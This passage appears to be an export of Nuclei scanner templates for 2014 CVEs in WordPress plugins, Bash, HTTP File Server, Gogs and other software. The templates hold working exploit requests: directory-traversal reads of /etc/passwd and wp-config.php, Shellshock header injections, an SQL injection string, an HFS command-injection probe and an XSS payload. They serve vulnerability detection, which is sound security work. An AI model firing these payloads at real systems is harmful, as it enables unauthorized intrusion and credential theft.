https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2014-4940\n cwe-id: CWE-22\n epss-score: 0.03212\n epss-percentile: 0.90985\n cpe: cpe:2.3:a:tera_charts_plugin_project:tera-charts:0.1:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: tera_charts_plugin_project\n product: tera-charts\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/tera-charts\"\n tags: cve2014,cve,wordpress,wp-plugin,lfi,tera_charts_plugin_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100f7fabab204109ff54cd90e8f812aa822a90c66eb03d80cebef59c28ba65c19920221009c5c4a4fbb6cdd88155f2a4e88f39da697ce828dac7d469c80e87613d4103203:922c64590222798bb761d5b6d8e72950", "hash": "f07e61efd890abbccc75f343f2191d86", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f23" }, "name": "CVE-2014-4942.yaml", "content": "id: CVE-2014-4942\n\ninfo:\n name: WordPress EasyCart <2.0.6 - Information Disclosure\n author: DhiyaneshDk\n severity: medium\n description: |\n WordPress EasyCart plugin before 2.0.6 contains an information disclosure vulnerability. An attacker can obtain configuration information via a direct request to inc/admin/phpinfo.php, which calls the phpinfo function.\n impact: |\n An attacker can gain sensitive information from the target system.\n remediation: |\n Upgrade to WordPress EasyCart version 2.0.6 or later.\n reference:\n - https://wpscan.com/vulnerability/64ea4135-eb26-4dea-a13f-f4c1deb77150\n - https://codevigilant.com/disclosure/wp-plugin-wp-easycart-information-disclosure\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4942\n - https://nvd.nist.gov/vuln/detail/CVE-2014-4942\n - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=829290%40wp-easycart&old=827627%40wp-easycart&sfp_email=&sfph_mail=\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2014-4942\n cwe-id: CWE-200\n epss-score: 0.01024\n epss-percentile: 0.82199\n cpe: cpe:2.3:a:levelfourdevelopment:wp-easycart:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: levelfourdevelopment\n product: wp-easycart\n framework: wordpress\n tags: cve2014,cve,wpscan,wordpress,wp-plugin,wp,phpinfo,disclosure,levelfourdevelopment\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/wp-easycart/inc/admin/phpinfo.php\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"PHP Extension\"\n - \"PHP Version\"\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n part: body\n group: 1\n regex:\n - '>PHP Version <\\/td>([0-9.]+)'\n# digest: 490a004630440220342dce47a8408c74a401ff37d16e9bdac22e456deb97b98dd0c3c7b4b7daed5702206190335d1ce1d1991a9d8e91c114329267ce0095e548d99dd945e381ab003da3:922c64590222798bb761d5b6d8e72950", "hash": "fa30586e194d458dcd69c663ad38ace5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f24" }, "name": "CVE-2014-5111.yaml", "content": "id: CVE-2014-5111\n\ninfo:\n name: Fonality trixbox - Local File Inclusion\n author: daffainfo\n severity: medium\n description: Multiple local file inclusion vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks.\n remediation: |\n Apply the latest patches and updates provided by the vendor to fix the local file inclusion vulnerability in Fonality trixbox.\n reference:\n - https://www.exploit-db.com/exploits/39351\n - https://nvd.nist.gov/vuln/detail/CVE-2014-5111\n - http://packetstormsecurity.com/files/127522/Trixbox-XSS-LFI-SQL-Injection-Code-Execution.html\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2014-5111\n cwe-id: CWE-22\n epss-score: 0.02194\n epss-percentile: 0.89179\n cpe: cpe:2.3:a:netfortris:trixbox:-:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: netfortris\n product: trixbox\n tags: cve2014,cve,packetstorm,lfi,trixbox,edb,netfortris,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220549fc7717d5fce647686a6dbb01d128134199b2bb5d130536dc6fdb4300d7b5c022100e23b8a0fdab8f1482a479f40a7523e3c8398707233dc2482ccac988725d727ee:922c64590222798bb761d5b6d8e72950", "hash": "fdc40b4f71e0fb034c0b1ee5df925a72", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f25" }, "name": "CVE-2014-5258.yaml", "content": "id: CVE-2014-5258\n\ninfo:\n name: webEdition 6.3.8.0 - Directory Traversal\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter.\n impact: |\n An attacker can read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Upgrade to a patched version of webEdition or apply the necessary security patches to fix the directory traversal vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2014-5258\n - https://www.exploit-db.com/exploits/34761\n - http://packetstormsecurity.com/files/128301/webEdition-6.3.8.0-Path-Traversal.html\n - http://www.webedition.org/de/webedition-cms/versionshistorie/webedition-6/version-6.3.9.0\n - http://www.webedition.org/de/aktuelles/webedition-cms/webEdition-6.3.9-Beta-erschienen\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:S/C:P/I:N/A:N\n cvss-score: 4\n cve-id: CVE-2014-5258\n cwe-id: CWE-22\n epss-score: 0.01386\n epss-percentile: 0.86062\n cpe: cpe:2.3:a:webedition:webedition_cms:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: webedition\n product: webedition_cms\n tags: cve2014,cve,edb,packetstorm,lfi,webedition\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/webEdition/showTempFile.php?file=../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402206b9d4be5067970ffa3d8e02079c4abf8441c982e0b6c0c19941b0a7e203321fc02201fede3e0462fdb7ea5a4287170f517900610ef02f321923bb5a57227cf800b54:922c64590222798bb761d5b6d8e72950", "hash": "160153102978e77942b09dff4534e3a7", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f26" }, "name": "CVE-2014-5368.yaml", "content": "id: CVE-2014-5368\n\ninfo:\n name: WordPress Plugin WP Content Source Control - Directory Traversal\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter.\n impact: |\n An attacker can read sensitive files on the server, potentially leading to unauthorized access or exposure of sensitive information.\n remediation: |\n Update to the latest version of the WP Content Source Control plugin to fix the directory traversal vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2014-5368\n - https://www.exploit-db.com/exploits/39287\n - http://seclists.org/oss-sec/2014/q3/417\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/95374\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2014-5368\n cwe-id: CWE-22\n epss-score: 0.09191\n epss-percentile: 0.94512\n cpe: cpe:2.3:a:wp_content_source_control_project:wp_content_source_control:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: wp_content_source_control_project\n product: wp_content_source_control\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/wp-source-control\"\n tags: cve2014,cve,wordpress,wp-plugin,lfi,edb,seclists,wp_content_source_control_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"DB_NAME\"\n - \"DB_PASSWORD\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d69ee1fd512ebb21e3ef12903964a91f9d7ada78be70bf55c71ec977f4900eb2022007f9bf1c552bd638825024917e8ce6ed2768429fc5db5f1f78eda30f4cf9bebe:922c64590222798bb761d5b6d8e72950", "hash": "e1038483c8fb8d99124ec3ac5bc937cc", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f27" }, "name": "CVE-2014-6271.yaml", "content": "id: CVE-2014-6271\n\ninfo:\n name: ShellShock - Remote Code Execution\n author: pentest_swissky,0xelkomy\n severity: critical\n description: GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka ShellShock.\n impact: |\n Remote code execution can lead to unauthorized access, data theft, and system compromise.\n remediation: |\n Apply the necessary patches and updates provided by the vendor to fix the vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2014-6271\n - https://nvd.nist.gov/vuln/detail/CVE-2014-7169\n - http://www.kb.cert.org/vuls/id/252743\n - http://www.us-cert.gov/ncas/alerts/TA14-268A\n - http://advisories.mageia.org/MGASA-2014-0388.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2014-6271\n cwe-id: CWE-78\n epss-score: 0.97559\n epss-percentile: 0.99997\n cpe: cpe:2.3:a:gnu:bash:1.14.0:*:*:*:*:*:*:*\n metadata:\n max-request: 8\n vendor: gnu\n product: bash\n tags: cve2014,cve,rce,shellshock,kev,gnu\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\"\n - \"{{BaseURL}}/cgi-bin/status\"\n - \"{{BaseURL}}/cgi-bin/stats\"\n - \"{{BaseURL}}/cgi-bin/test\"\n - \"{{BaseURL}}/cgi-bin/status/status.cgi\"\n - \"{{BaseURL}}/test.cgi\"\n - \"{{BaseURL}}/debug.cgi\"\n - \"{{BaseURL}}/cgi-bin/test-cgi\"\n\n stop-at-first-match: true\n\n headers:\n Shellshock: \"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd \"\n Referer: \"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd \"\n Cookie: \"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd \"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022022d9c0adae74cdc979a9807c7b6c229b34bbaf77fdf9fb5edbd4263a3e3d939d022100bff54d932fc7f8bc11b979b2289b87a588833b45578f1945d5e8dc9a7021354b:922c64590222798bb761d5b6d8e72950", "hash": "02a172d9946bcd90eed267871a0a5202", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f28" }, "name": "CVE-2014-6287.yaml", "content": "id: 'CVE-2014-6287'\n\ninfo:\n name: HTTP File Server <2.3c - Remote Command Execution\n author: j4vaovo\n severity: critical\n description: |\n HTTP File Server before 2.3c is susceptible to remote command execution. The findMacroMarker function in parserLib.pas allows an attacker to execute arbitrary programs via a %00 sequence in a search action. Therefore, an attacker can obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.\n remediation: |\n Upgrade to the latest version of HTTP File Server (>=2.3c) to mitigate this vulnerability.\n reference:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6287\n - http://www.kb.cert.org/vuls/id/251276\n - http://packetstormsecurity.com/files/128243/HttpFileServer-2.3.x-Remote-Command-Execution.html\n - https://github.com/rapid7/metasploit-framework/pull/3793\n - https://nvd.nist.gov/vuln/detail/CVE-2014-6287\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: 'CVE-2014-6287'\n cwe-id: CWE-94\n epss-score: 0.97289\n epss-percentile: 0.99851\n cpe: cpe:2.3:a:rejetto:http_file_server:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: rejetto\n product: http_file_server\n shodan-query: http.favicon.hash:2124459909\n tags: cve2014,cve,packetstorm,msf,hfs,rce,kev,rejetto\nvariables:\n str1: '{{rand_base(6)}}'\n str2: 'CVE-2014-6287'\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/?search==%00{.cookie|{{str1}}|value%3d{{str2}}.}'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'HFS /'\n\n - type: word\n part: header\n words:\n - 'Set-Cookie: {{str1}}={{str2}};'\n - 'text/html'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502204bde1c3f42a0592f723d6907f857453ffc1cbaeade6b35e9f6d475fdbdf132c9022100e2f30a443e5904e106b93955a85dde211a5249aead2a75f789325c42c40efadc:922c64590222798bb761d5b6d8e72950", "hash": "b9e8825e2d4a2c663b54f6c2e22dcf81", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f29" }, "name": "CVE-2014-6308.yaml", "content": "id: CVE-2014-6308\n\ninfo:\n name: Osclass Security Advisory 3.4.1 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a render action to oc-admin/index.php.\n impact: |\n An attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation.\n remediation: |\n Upgrade to a patched version of Osclass (3.4.2 or later) to mitigate the vulnerability.\n reference:\n - https://packetstormsecurity.com/files/128285/OsClass-3.4.1-Local-File-Inclusion.html\n - https://nvd.nist.gov/vuln/detail/CVE-2014-6308\n - https://github.com/osclass/Osclass/commit/c163bf5910d0d36424d7fc678da6b03a0e443435\n - https://www.netsparker.com/lfi-vulnerability-in-osclass/\n - http://blog.osclass.org/2014/09/15/osclass-3-4-2-ready-download/\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2014-6308\n cwe-id: CWE-22\n epss-score: 0.0922\n epss-percentile: 0.94519\n cpe: cpe:2.3:a:osclass:osclass:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: osclass\n product: osclass\n tags: cve2014,cve,lfi,packetstorm,osclass\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100b55ba5c5bc0603bce568d991022be9818e26de9699fdecf5a734aa850dc13200022042473693f82c1c425062e207b10679c75162af12660a60d0038719261ec111d8:922c64590222798bb761d5b6d8e72950", "hash": "9babb6addf6d877a3d69f838759a4edd", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f2a" }, "name": "CVE-2014-8676.yaml", "content": "id: CVE-2014-8676\n\ninfo:\n name: Simple Online Planning Tool <1.3.2 - Local File Inclusion\n author: 0x_Akoko\n severity: medium\n description: |\n SOPlanning <1.32 contain a directory traversal in the file_get_contents function via a .. (dot dot) in the fichier parameter.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the server.\n remediation: |\n Upgrade Simple Online Planning Tool to version 1.3.2 or higher to fix the Local File Inclusion vulnerability.\n reference:\n - https://packetstormsecurity.com/files/132654/Simple-Online-Planning-Tool-1.3.2-XSS-SQL-Injection-Traversal.html\n - https://www.exploit-db.com/exploits/37604/\n - http://seclists.org/fulldisclosure/2015/Jul/44\n - https://nvd.nist.gov/vuln/detail/CVE-2014-8676\n - http://packetstormsecurity.com/files/132654/Simple-Online-Planning-Tool-1.3.2-XSS-SQL-Injection-Traversal.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2014-8676\n cwe-id: CWE-22\n epss-score: 0.00195\n epss-percentile: 0.56456\n cpe: cpe:2.3:a:soplanning:soplanning:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: soplanning\n product: soplanning\n tags: cve2014,cve,packetstorm,edb,seclists,soplanning,lfi,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/process/feries.php?fichier=../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402206611bdf8fb4c40e1d04dce364dce4905c11bbe2266ca7465719b55cf98d7949602207babdd83687bb04e4175613fe704b5c7b653537bbc366a9c8822e295b1cf16fc:922c64590222798bb761d5b6d8e72950", "hash": "f6431640d245a50e4b995132849f2d7d", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f2b" }, "name": "CVE-2014-8682.yaml", "content": "id: CVE-2014-8682\n\ninfo:\n name: Gogs (Go Git Service) - SQL Injection\n author: dhiyaneshDK,daffainfo\n severity: high\n description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the entire system.\n remediation: |\n Apply the latest security patches and updates provided by the Gogs project to mitigate the SQL Injection vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2014-8682\n - http://seclists.org/fulldisclosure/2014/Nov/33\n - http://packetstormsecurity.com/files/129117/Gogs-Repository-Search-SQL-Injection.html\n - https://github.com/gogits/gogs/commit/0c5ba4573aecc9eaed669e9431a70a5d9f184b8d\n - https://www.exploit-db.com/exploits/35238\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/98694\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2014-8682\n cwe-id: CWE-89\n epss-score: 0.00808\n epss-percentile: 0.79839\n cpe: cpe:2.3:a:gogits:gogs:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: gogits\n product: gogs\n shodan-query: title:\"Sign In - Gogs\"\n tags: cve2014,cve,gogs,seclists,packetstorm,edb,sqli,gogits\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"ok\":true'\n - '\"data\"'\n - '\"repolink\":\"'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100814319b746978b7ca718b8e25ca06acff4cad96360cbdef067269198629865cc02203d59471b74f7036f8c629f2e3a72650ce063c6c2bcf30ed8a1165aad0b4935ce:922c64590222798bb761d5b6d8e72950", "hash": "3148bf4939fd0cbea59e742bf06a43f2", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f2c" }, "name": "CVE-2014-8799.yaml", "content": "id: CVE-2014-8799\n\ninfo:\n name: WordPress Plugin DukaPress 2.5.2 - Directory Traversal\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to sensitive files, potentially leading to further compromise of the server.\n remediation: |\n Update to the latest version of DukaPress plugin (2.5.3 or higher) which contains a fix for this vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2014-8799\n - https://www.exploit-db.com/exploits/35346\n - https://wordpress.org/plugins/dukapress/changelog/\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/98943\n - https://plugins.trac.wordpress.org/changeset/1024640/dukapress\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2014-8799\n cwe-id: CWE-22\n epss-score: 0.17844\n epss-percentile: 0.96039\n cpe: cpe:2.3:a:dukapress:dukapress:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: dukapress\n product: dukapress\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/dukapress\"\n tags: cve2014,cve,wordpress,wp-plugin,lfi,edb,dukapress\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"DB_NAME\"\n - \"DB_PASSWORD\"\n - \"DB_USER\"\n - \"DB_HOST\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402204edbc71eff8a4e2f830a6b91adba5649b330babc92cb13db3bc72f9eeadeeaed022032a4104312eed8dab0af4f004d133ef1c781de314cd466bcef35194a980c55c1:922c64590222798bb761d5b6d8e72950", "hash": "ce24da8cd22ea5748dec7eea3a46950d", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f2d" }, "name": "CVE-2014-9094.yaml", "content": "id: CVE-2014-9094\n\ninfo:\n name: WordPress DZS-VideoGallery Plugin Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: Multiple cross-site scripting vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of the WordPress DZS-VideoGallery Plugin, which includes a fix for this vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2014-9094\n - http://websecurity.com.ua/7152/\n - http://seclists.org/fulldisclosure/2014/Jul/65\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/d4n-sec/d4n-sec.github.io\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2014-9094\n cwe-id: CWE-79\n epss-score: 0.32637\n epss-percentile: 0.96912\n cpe: cpe:2.3:a:digitalzoomstudio:video_gallery:-:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: digitalzoomstudio\n product: video_gallery\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/dzs-videogallery\"\n tags: cve2014,cve,wordpress,xss,wp-plugin,seclists,digitalzoomstudio\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/dzs-videogallery/readme HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Video Gallery WordPress DZS'\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100f33fbedc30570d477f0ca3fdf865e0b9d6a89eb72953eab70581c1657322d4d802204db1cd868a9f5b6daafb09716cab8669f1539216ffc9af3df54e317613be7368:922c64590222798bb761d5b6d8e72950", "hash": "94f686bea339c7d0ff5c3ccacc28c527", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f2e" }, "name": "CVE-2014-9119.yaml", "content": "id: CVE-2014-9119\n\ninfo:\n name: WordPress DB Backup <=4.5 - Local File Inclusion\n author: dhiyaneshDK\n severity: medium\n description: |\n WordPress Plugin DB Backup 4.5 and possibly prior versions are prone to a local file inclusion vulnerability because they fail to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.\n impact: |\n Allows an attacker to read arbitrary files on the server.\n remediation: |\n Update WordPress DB Backup plugin to version 4.6 or higher.\n reference:\n - https://wpscan.com/vulnerability/d3f1e51e-5f44-4a15-97bc-5eefc3e77536\n - https://www.exploit-db.com/exploits/35378\n - https://nvd.nist.gov/vuln/detail/CVE-2014-9119\n - https://wpvulndb.com/vulnerabilities/7726\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/99368\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2014-9119\n cwe-id: CWE-22\n epss-score: 0.11639\n epss-percentile: 0.95149\n cpe: cpe:2.3:a:db_backup_project:db_backup:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: db_backup_project\n product: db_backup\n framework: wordpress\n tags: cve2014,cve,lfi,wordpress,wp-plugin,wp,backup,wpscan,edb,db_backup_project\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"DB_NAME\"\n - \"DB_PASSWORD\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402200ab09228c893b1ee93d8eef722707d966f04b94eaf2b6979ef784accbbca3cd20220253e29578ffae76a82b5b19b0a066d92ae8ebcc1950101953d4b994cd366b495:922c64590222798bb761d5b6d8e72950", "hash": "d5899e8a33af2bb862c62d5f1259ca5d", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f2f" }, "name": "CVE-2014-9180.yaml", "content": "id: CVE-2014-9180\n\ninfo:\n name: Eleanor CMS - Open Redirect\n author: Shankar Acharya\n severity: medium\n description: |\n Open redirect vulnerability in go.php in Eleanor CMS allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the QUERY_STRING.\n remediation: |\n Update to the latest version of Eleanor CMS to fix the open redirect vulnerability.\n reference:\n - https://packetstormsecurity.com/files/129087/Eleanor-CMS-Open-Redirect.html\n - https://nvd.nist.gov/vuln/detail/CVE-2014-9180\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:N/I:P/A:N\n cvss-score: 5\n cve-id: CVE-2014-9180\n cwe-id: CWE-601\n epss-score: 0.00285\n epss-percentile: 0.6809\n cpe: cpe:2.3:a:eleanor-cms:eleanor_cms:-:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: eleanor-cms\n product: eleanor_cms\n shodan-query: html:\"eleanor\"\n tags: cve2014,cve,packetstorm,eleanor,cms,redirect,eleanor-cms\n\nhttp:\n - method: GET\n path:\n - 